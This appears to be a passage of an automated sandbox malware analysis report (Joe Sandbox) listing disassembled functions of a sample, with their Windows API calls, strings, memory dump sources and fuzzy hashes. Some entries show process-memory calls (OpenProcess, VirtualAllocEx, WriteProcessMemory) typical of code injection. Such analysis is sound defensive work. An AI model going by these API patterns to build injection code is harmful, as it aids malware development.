                                                                                  • Opcode Fuzzy Hash: e41899405f5fa70afe430c84ea390ef5a68ac15a632d545d26e2b751ff3a09d9
                                                                                  • Instruction Fuzzy Hash: 34A133356043059FCB10DF15C885E6EBBE5BF88324F048999F99A9B3A1CB31EC45CB91
                                                                                  Function 0051325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 005132ED
                                                                                    • Part of subcall function 0051E0D0: __87except.LIBCMT ref: 0051E10B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorHandling__87except__start
                                                                                  • String ID: pow
                                                                                  • API String ID: 2905807303-2276729525
                                                                                  • Opcode ID: 7520699cd9a203f4220197deb02f7c0fb6d660153d6dfa925e0dafa8075b59ba
                                                                                  • Instruction ID: f2a348f869786ff3fca84a0f86297c8f0a8f489a0f56dbb7e3ca436e848b9631
                                                                                  • Opcode Fuzzy Hash: 7520699cd9a203f4220197deb02f7c0fb6d660153d6dfa925e0dafa8075b59ba
                                                                                  • Instruction Fuzzy Hash: EB513735A0820296FB157714C9663FA6F94BB91710F208D68FCF5821A9DF748DC8EB46
                                                                                  Function 00534606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0058DC50,?,0000000F,0000000C,00000016,0058DC50,?), ref: 00534645
                                                                                    • Part of subcall function 004F936C: __swprintf.LIBCMT ref: 004F93AB
                                                                                    • Part of subcall function 004F936C: __itow.LIBCMT ref: 004F93DF
                                                                                  • CharUpperBuffW.USER32(?,?,00000000,?), ref: 005346C5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharUpper$__itow__swprintf
                                                                                  • String ID: REMOVE$THIS
                                                                                  • API String ID: 3797816924-776492005
                                                                                  • Opcode ID: 89827fdab3f9e80ea1702a7d64f340bf9bd22172d69fd3e0f8e29c6a06a23259
                                                                                  • Instruction ID: db8c7d3fec376725daa58cdf22f4c39b0e57396842187e58f197805bb9fdec56
                                                                                  • Opcode Fuzzy Hash: 89827fdab3f9e80ea1702a7d64f340bf9bd22172d69fd3e0f8e29c6a06a23259
                                                                                  • Instruction Fuzzy Hash: 16417234A002599FCF00EF65C885ABDBBB5FF49304F148469E916AB292DB35ED46CF50
                                                                                  Function 0052C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0053430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0052BC08,?,?,00000034,00000800,?,00000034), ref: 00534335
                                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0052C1D3
                                                                                    • Part of subcall function 005342D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0052BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00534300
                                                                                    • Part of subcall function 0053422F: GetWindowThreadProcessId.USER32(?,?), ref: 0053425A
                                                                                    • Part of subcall function 0053422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0052BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0053426A
                                                                                    • Part of subcall function 0053422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0052BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00534280
                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0052C240
                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0052C28D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                  • String ID: @
                                                                                  • API String ID: 4150878124-2766056989
                                                                                  • Opcode ID: dabc695a6d822d06ce494587788151eae308d8f90da13eabc204c17e85e30222
                                                                                  • Instruction ID: 6aede8078379dc0ba8a6d0b9f79177e38ed201795b4dc8a150f05b67df4f95b0
                                                                                  • Opcode Fuzzy Hash: dabc695a6d822d06ce494587788151eae308d8f90da13eabc204c17e85e30222
                                                                                  • Instruction Fuzzy Hash: 42415C76900219AFDB10EFA4DC85AEEBB78BF49300F004095FA55B7181DA716E85DF61
                                                                                  Function 0055A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0058DC00,00000000,?,?,?,?), ref: 0055A6D8
                                                                                  • GetWindowLongW.USER32 ref: 0055A6F5
                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0055A705
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Long
                                                                                  • String ID: SysTreeView32
                                                                                  • API String ID: 847901565-1698111956
                                                                                  • Opcode ID: 3032556ecc041722dbbae2d4456f8441772c263ed34814c4dc82c1e806ad4c26
                                                                                  • Instruction ID: 5af0d32ee48fc9dbc7fb00ab644f20f3eace6036940adb82b6b90f50329579ba
                                                                                  • Opcode Fuzzy Hash: 3032556ecc041722dbbae2d4456f8441772c263ed34814c4dc82c1e806ad4c26
                                                                                  • Instruction Fuzzy Hash: 6331AD31600206ABDB118E38DC55BEA7BA9FF89364F244716F875931E0C770AC589BA0
                                                                                  Function 00545180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00545190
                                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 005451C6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CrackInternet_memset
                                                                                  • String ID: |$DT
                                                                                  • API String ID: 1413715105-4036583020
                                                                                  • Opcode ID: 0c806dfa1207d4703efebda967a520a69e9b7e6abd106df181ce79e833abd552
                                                                                  • Instruction ID: 07604bc4c3df803ba8aa7472ee179187bd2a9395bbaba249227ae9f9d7be55f9
                                                                                  • Opcode Fuzzy Hash: 0c806dfa1207d4703efebda967a520a69e9b7e6abd106df181ce79e833abd552
                                                                                  • Instruction Fuzzy Hash: BF316A71C0010DABCF01EFA1CC85AEEBFB8FF14704F00005AF904A6166EB75AA46CBA0
                                                                                  Function 0055A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0055A15E
                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0055A172
                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 0055A196
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window
                                                                                  • String ID: SysMonthCal32
                                                                                  • API String ID: 2326795674-1439706946
                                                                                  • Opcode ID: 4d2840879cdc8413558f3264e278c67dcfe3050d57d02a14cb0fa332f8104839
                                                                                  • Instruction ID: 1c3164db77b1ab373eae3bd6cd3294e8443d3e4d07b11240c444a4e232ae05ed
                                                                                  • Opcode Fuzzy Hash: 4d2840879cdc8413558f3264e278c67dcfe3050d57d02a14cb0fa332f8104839
                                                                                  • Instruction Fuzzy Hash: 3A219C32500218ABDF118EA4CC56FEA3B7AFF88714F100215FE55AB190D7B5A858DBA0
                                                                                  Function 0055A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0055A941
                                                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0055A94F
                                                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0055A956
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$DestroyWindow
                                                                                  • String ID: msctls_updown32
                                                                                  • API String ID: 4014797782-2298589950
                                                                                  • Opcode ID: e9cc6f2a3769ac6ebfbe767bd9a3077ca0fdc94c8772045bac7fdc791e7340af
                                                                                  • Instruction ID: bbcc1faf9cbef32a090b7df710d4f5f695521869152cb2656e51d3de0c25d257
                                                                                  • Opcode Fuzzy Hash: e9cc6f2a3769ac6ebfbe767bd9a3077ca0fdc94c8772045bac7fdc791e7340af
                                                                                  • Instruction Fuzzy Hash: FF21AEB5600209AFDB10DF18CCA1DB73BBDFF5A3A4B04025AFA049B261CB30EC159B61
                                                                                  Function 005599A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00559A30
                                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00559A40
                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00559A65
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$MoveWindow
                                                                                  • String ID: Listbox
                                                                                  • API String ID: 3315199576-2633736733
                                                                                  • Opcode ID: 771ae053037b2c734b6db204eb2acc05776578953a4ede672aa6630423cb9ad8
                                                                                  • Instruction ID: eaa1993fd6483fd4e5f6109557d7328816f6afef165d5cfd33d230e11d8b57f1
                                                                                  • Opcode Fuzzy Hash: 771ae053037b2c734b6db204eb2acc05776578953a4ede672aa6630423cb9ad8
                                                                                  • Instruction Fuzzy Hash: 7521D032600118BFDF218F54DC85EBB3BBAFF89761F01812AF9449B190C6759C5597A0
                                                                                  Function 0055A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0055A46D
                                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0055A482
                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0055A48F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: msctls_trackbar32
                                                                                  • API String ID: 3850602802-1010561917
                                                                                  • Opcode ID: 7eac22bf559ba28c5fb0c574b00cafa257e048e653091dfdd1c881bbc86e2f94
                                                                                  • Instruction ID: 184feb8f85ce839641835b01a5d9d0e209d5fc5fb07460919fac409f086a4b9a
                                                                                  • Opcode Fuzzy Hash: 7eac22bf559ba28c5fb0c574b00cafa257e048e653091dfdd1c881bbc86e2f94
                                                                                  • Instruction Fuzzy Hash: 1611E771200208BEEF245FA4CC59FAB3B69FFC9754F014219FA45A6091D7B1E815DB24
                                                                                  Function 00512287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00512350,?), ref: 005122A1
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 005122A8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: RoInitialize$combase.dll
                                                                                  • API String ID: 2574300362-340411864
                                                                                  • Opcode ID: 45dbc129259a4bea6f2342aa30902cc236bab3010d29591b9f9855e88ab8fa9e
                                                                                  • Instruction ID: 2803736e868363797d9f85a74b0c4498254973c39c3145862a4a39054e455d8d
                                                                                  • Opcode Fuzzy Hash: 45dbc129259a4bea6f2342aa30902cc236bab3010d29591b9f9855e88ab8fa9e
                                                                                  • Instruction Fuzzy Hash: 09E01A74A90300ABEB905F74EC4EB5A3A74BB21702F005120F106E50E0DBB55098FF24
                                                                                  Function 0051235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00512276), ref: 00512376
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0051237D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: RoUninitialize$combase.dll
                                                                                  • API String ID: 2574300362-2819208100
                                                                                  • Opcode ID: 906858997ababaa6b0d6ae0267f9733ee9b29b5568e7253ab495a50ab6fd3173
                                                                                  • Instruction ID: 953fbb4dceba7510ec0b61369c4de9f3d30de423982bce0a8395201c6e9c1b6b
                                                                                  • Opcode Fuzzy Hash: 906858997ababaa6b0d6ae0267f9733ee9b29b5568e7253ab495a50ab6fd3173
                                                                                  • Instruction Fuzzy Hash: 91E0B670544300ABEBA45F64FD0DB0A3A78BB20702F105924F10DE20F0DBB9A498FE24
                                                                                  Function 0056AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: LocalTime__swprintf
                                                                                  • String ID: %.3d$WIN_XPe
                                                                                  • API String ID: 2070861257-2409531811
                                                                                  • Opcode ID: 088ba83365671af345b89e0d3d93c5bbb6540bc3ff7dfe3675080ac78d1de3ad
                                                                                  • Instruction ID: 0f7bb6a4c3afcc6fd4a92eec72f7e118ff3c4691fa938ceb24c8cbbf78c7ba3d
                                                                                  • Opcode Fuzzy Hash: 088ba83365671af345b89e0d3d93c5bbb6540bc3ff7dfe3675080ac78d1de3ad
                                                                                  • Instruction Fuzzy Hash: AFE01271804A18DBEB509790DD45DF97BBCBB04741F1408D2B906B3140D6359FC4AF22
                                                                                  Function 00552205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,005521FB,?,005523EF), ref: 00552213
                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00552225
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: GetProcessId$kernel32.dll
                                                                                  • API String ID: 2574300362-399901964
                                                                                  • Opcode ID: c31c7658826d651b2749c6573ca2b62241c3a81f63809f0e2ec49d1e406905b4
                                                                                  • Instruction ID: f753635bf845ee2c0fe30a928ea60911a52d13770d8f3655c07e1d8e57ad4c92
                                                                                  • Opcode Fuzzy Hash: c31c7658826d651b2749c6573ca2b62241c3a81f63809f0e2ec49d1e406905b4
                                                                                  • Instruction Fuzzy Hash: 31D05E388007129FC7215BA4B8086057AF8BF1A311F10441AAC45A2150E7B0D8C8EF60
                                                                                  Function 004F42F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000000,004F42EC,?,004F42AA,?), ref: 004F4304
                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 004F4316
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                  • API String ID: 2574300362-1355242751
                                                                                  • Opcode ID: ef34960408a9feb7876b0ecf9cab7e463494b37a63875fd3ef1b20d684ab19ec
                                                                                  • Instruction ID: af1a4f8472de8170e08ff7ab86e4548f524e151d8429ee465619c0da2442caea
                                                                                  • Opcode Fuzzy Hash: ef34960408a9feb7876b0ecf9cab7e463494b37a63875fd3ef1b20d684ab19ec
                                                                                  • Instruction Fuzzy Hash: 26D0A7309007129FC7204F64F80C6177BF8BF55311F00441AED45D2260EBB4C8C4DB20
                                                                                  Function 004F434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,004F41BB,004F4341,?,004F422F,?,004F41BB,?,?,?,?,004F39FE,?,00000001), ref: 004F4359
                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 004F436B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                  • API String ID: 2574300362-3689287502
